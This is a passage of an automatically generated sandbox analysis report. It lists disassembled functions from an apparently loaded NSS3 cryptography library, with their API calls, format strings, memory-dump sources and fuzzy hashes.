                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?), ref: 6BF2593A
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?), ref: 6BF25960
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?), ref: 6BF2597B
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF259A0
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF259AF
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF259D3
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF259E2
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF25A0A
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BF25A19
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(0h0x%08lx,00000001), ref: 6BF25A68
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s,%s,00000000,00000000), ref: 6BF25A7D
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25A8F
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25A95
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s,0l0x%08lx,00000000,00000001), ref: 6BF25AC6
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25AD3
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(0l0x%08lx,00000001), ref: 6BF25AE4
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%d,trustOrder,?), ref: 6BF25B15
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%d,cipherOrder,?), ref: 6BF25B39
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25B5D
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25B81
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF25BA2
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s %s %s %s %s,?,6C010148,?,00000000,00000000), ref: 6BF25BBF
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF25BD8
                                                                                                                                                                                                                                                            • free.MOZGLUE(6C010148), ref: 6BF25BEE
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF25C06
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25C1E
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25C34
                                                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BF25C50
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF25C61
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strlen$R_smprintf$Alloc_Util$isspacememsetstrcat
                                                                                                                                                                                                                                                            • String ID: %s %s %s %s %s$%s,%s$%s,0l0x%08lx$%s=%d$0h0x%08lx$FIPS$FORTEZZA$Flags$cipherOrder$ciphers$slotParams$trustOrder
                                                                                                                                                                                                                                                            • API String ID: 2590695137-1909591022
                                                                                                                                                                                                                                                            • Opcode ID: 2afefe1401ceeebc33111119d3a839406ba9b180453955289f5ef9358d2f01d1
                                                                                                                                                                                                                                                            • Instruction ID: 9babb8c451ee565b1515bfda64da28372ef628a01926293d65fe37a8db3d8eca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2afefe1401ceeebc33111119d3a839406ba9b180453955289f5ef9358d2f01d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B14AB3D1015267DB129FF48C8266BB7B8AF56348F050139ED06A7324EB38E915C7E2
                                                                                                                                                                                                                                                            Function 6BFD09D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6BFD0A22
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6BFD0A27), ref: 6BF89DC6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6BFD0A27), ref: 6BF89DD1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF89DED
                                                                                                                                                                                                                                                            • PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BFD0A35
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BEB382A
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BEB3879
                                                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BFD0A66
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BFD0A70
                                                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BFD0A9D
                                                                                                                                                                                                                                                            • PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BFD0AC8
                                                                                                                                                                                                                                                            • PR_vsmprintf.NSS3(?,?), ref: 6BFD0AE8
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFD0B19
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6BFD0B48
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(?), ref: 6BFD0B88
                                                                                                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BFD0C36
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0C45
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6BFD0C5D
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFD0C76
                                                                                                                                                                                                                                                            • PR_LogFlush.NSS3 ref: 6BFD0C7E
                                                                                                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BFD0C8D
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0C9C
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(?), ref: 6BFD0CD1
                                                                                                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BFD0CEC
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0CFB
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6BFD0D16
                                                                                                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BFD0D26
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0D35
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(0000000A), ref: 6BFD0D65
                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BFD0D70
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0D7E
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFD0D90
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFD0D99
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %ld[%p]: , xrefs: 6BFD0A96
                                                                                                                                                                                                                                                            • %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6BFD0A5B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
                                                                                                                                                                                                                                                            • String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
                                                                                                                                                                                                                                                            • API String ID: 3820836880-2800039365
                                                                                                                                                                                                                                                            • Opcode ID: 4c301063f826307334088538f8b18aa0d1fe36b3dd58506e24f0d6b7b1f22441
                                                                                                                                                                                                                                                            • Instruction ID: 976ce440701983a1f8a9c48661a62c9feae209daf83ab232b3366512fbdf33ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c301063f826307334088538f8b18aa0d1fe36b3dd58506e24f0d6b7b1f22441
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCA1E672A002549FDF109B78CC4DF9A7B7DAF12318F1805A8F81593262DFBAE994CB51
                                                                                                                                                                                                                                                            Function 6BED6BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(6C010148,?,?,?,?,6BED6DC2), ref: 6BED6BFF
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6BED6DC2), ref: 6BED6C1C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEAC5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6BEB1FBD,Unable to create nspr log file '%s',00000000), ref: 6BEAC63B
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6C27
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6BED6DC2), ref: 6BED6C45
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6C50
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6BED6DC2), ref: 6BED6C71
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6C7C
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6BED6DC2), ref: 6BED6C9D
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6CA8
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6BED6DC2), ref: 6BED6CC9
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6CD4
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6BED6DC2), ref: 6BED6CF5
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6D00
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6BED6DC2), ref: 6BED6D1D
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6D28
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6BED6DC2), ref: 6BED6D45
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6D50
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s minPS=%d,00000000,?,6BED6DC2), ref: 6BED6D68
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,6BED6DC2), ref: 6BED6D73
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %s FIPSSlotDescription='%s', xrefs: 6BED6D18
                                                                                                                                                                                                                                                            • %s dbSlotDescription='%s', xrefs: 6BED6CF0
                                                                                                                                                                                                                                                            • %s minPS=%d, xrefs: 6BED6D63
                                                                                                                                                                                                                                                            • %s libraryDescription='%s', xrefs: 6BED6C40
                                                                                                                                                                                                                                                            • %s cryptoSlotDescription='%s', xrefs: 6BED6CC4
                                                                                                                                                                                                                                                            • %s dbTokenDescription='%s', xrefs: 6BED6C98
                                                                                                                                                                                                                                                            • %s cryptoTokenDescription='%s', xrefs: 6BED6C6C
                                                                                                                                                                                                                                                            • %s FIPSTokenDescription='%s', xrefs: 6BED6D40
                                                                                                                                                                                                                                                            • %s manufacturerID='%s', xrefs: 6BED6C17
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: R_smprintffree
                                                                                                                                                                                                                                                            • String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
                                                                                                                                                                                                                                                            • API String ID: 657075589-3414793728
                                                                                                                                                                                                                                                            • Opcode ID: 7e5c88d86bf6aa3bf91d25ec7d5bcc63222400cfe86c56a48f189267bd113de1
                                                                                                                                                                                                                                                            • Instruction ID: 7df4c7cb40a2517cef2217d4af9cfc75c0c6a5f1b95d2ad02983323d7cee2729
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e5c88d86bf6aa3bf91d25ec7d5bcc63222400cfe86c56a48f189267bd113de1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B41B1B6B014112BA701AA696C0AD7B3B9C9DC15DC7290174FC2DDB701FA6ACD2292E6
                                                                                                                                                                                                                                                            Function 6BEB0AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BEB0AD4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6BEB0B0D
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BEB0B2E
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BEB0B54
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6BEB0B94
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BEB0BC9
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6BEB0BEA
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6BEB0C15
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
                                                                                                                                                                                                                                                            • String ID: Loaded library %s (load lib)$error %d
                                                                                                                                                                                                                                                            • API String ID: 2139286163-2368894446
                                                                                                                                                                                                                                                            • Opcode ID: 388ec8e7d8f35e8ba59e380b559ff6abfd3a14263b06236f7cb032f0bc71c134
                                                                                                                                                                                                                                                            • Instruction ID: a882817520efbbd07d5f077e153a756cbe0360cdaf6fe9d207cbdb8f402404b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 388ec8e7d8f35e8ba59e380b559ff6abfd3a14263b06236f7cb032f0bc71c134
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F71D871A002109FEB119F78CF89B5AB7B8EB45758F144079E809D7242EB38EE54CF51
                                                                                                                                                                                                                                                            Function 6BED39F0 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 439memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BED5E6F,?), ref: 6BED3A08
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BED5E6F), ref: 6BED3A1C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6BED3AB0
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000038,?), ref: 6BED3AEA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB85
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BF1FBB1
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6BED3B03
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000020,?), ref: 6BED3B1C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB9B
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,-00000020,o^k), ref: 6BED3BF2
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BED3A3C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01B10: TlsGetValue.KERNEL32(00000000,?,6BED3147,?,?), ref: 6BF01B41
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01B10: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6BED3147,?,?), ref: 6BF01B51
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01B10: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BED3147), ref: 6BF01B7C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01B10: PR_SetError.NSS3(00000000,00000000), ref: 6BF01B94
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BED5E6F), ref: 6BED3A79
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BED3AC9
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BED3AD7
                                                                                                                                                                                                                                                            • PK11_DestroyObject.NSS3(?,?), ref: 6BED3C1B
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BED3C40
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$CopyItem_$Arena$Alloc_Arena_ErrorValue$CriticalEnterFreeSectionUnlock$AllocateDestroyInitK11_LockObjectPoolcallocmemcpymemset
                                                                                                                                                                                                                                                            • String ID: o^k$security
                                                                                                                                                                                                                                                            • API String ID: 2104508105-1624957545
                                                                                                                                                                                                                                                            • Opcode ID: ac135bbec7cc42f5fff64c8927a80f57ebc04d32020308df42edd2589f3df283
                                                                                                                                                                                                                                                            • Instruction ID: 93c0e453197d5929924069531885666bdba075897beb42ca84b25363521fe867
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac135bbec7cc42f5fff64c8927a80f57ebc04d32020308df42edd2589f3df283
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30E1BAB6900201ABEB208F65DC42F6777B8EF1474CF144469FC09D9262F779E916C761
                                                                                                                                                                                                                                                            Function 6BEFCB70 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 225fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6BF1444C,00000000,00000000,00000000,?,6BED7F7C,6BED80DD), ref: 6BEFCB8B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: TlsGetValue.KERNEL32(00000040,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB1267
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: EnterCriticalSection.KERNEL32(?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB127C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB1291
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: PR_Unlock.NSS3(?,?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB12A0
                                                                                                                                                                                                                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C00DEB5,?,6BF1444C,00000000,00000000,00000000,?,6BED7F7C,6BED80DD), ref: 6BEFCB9D
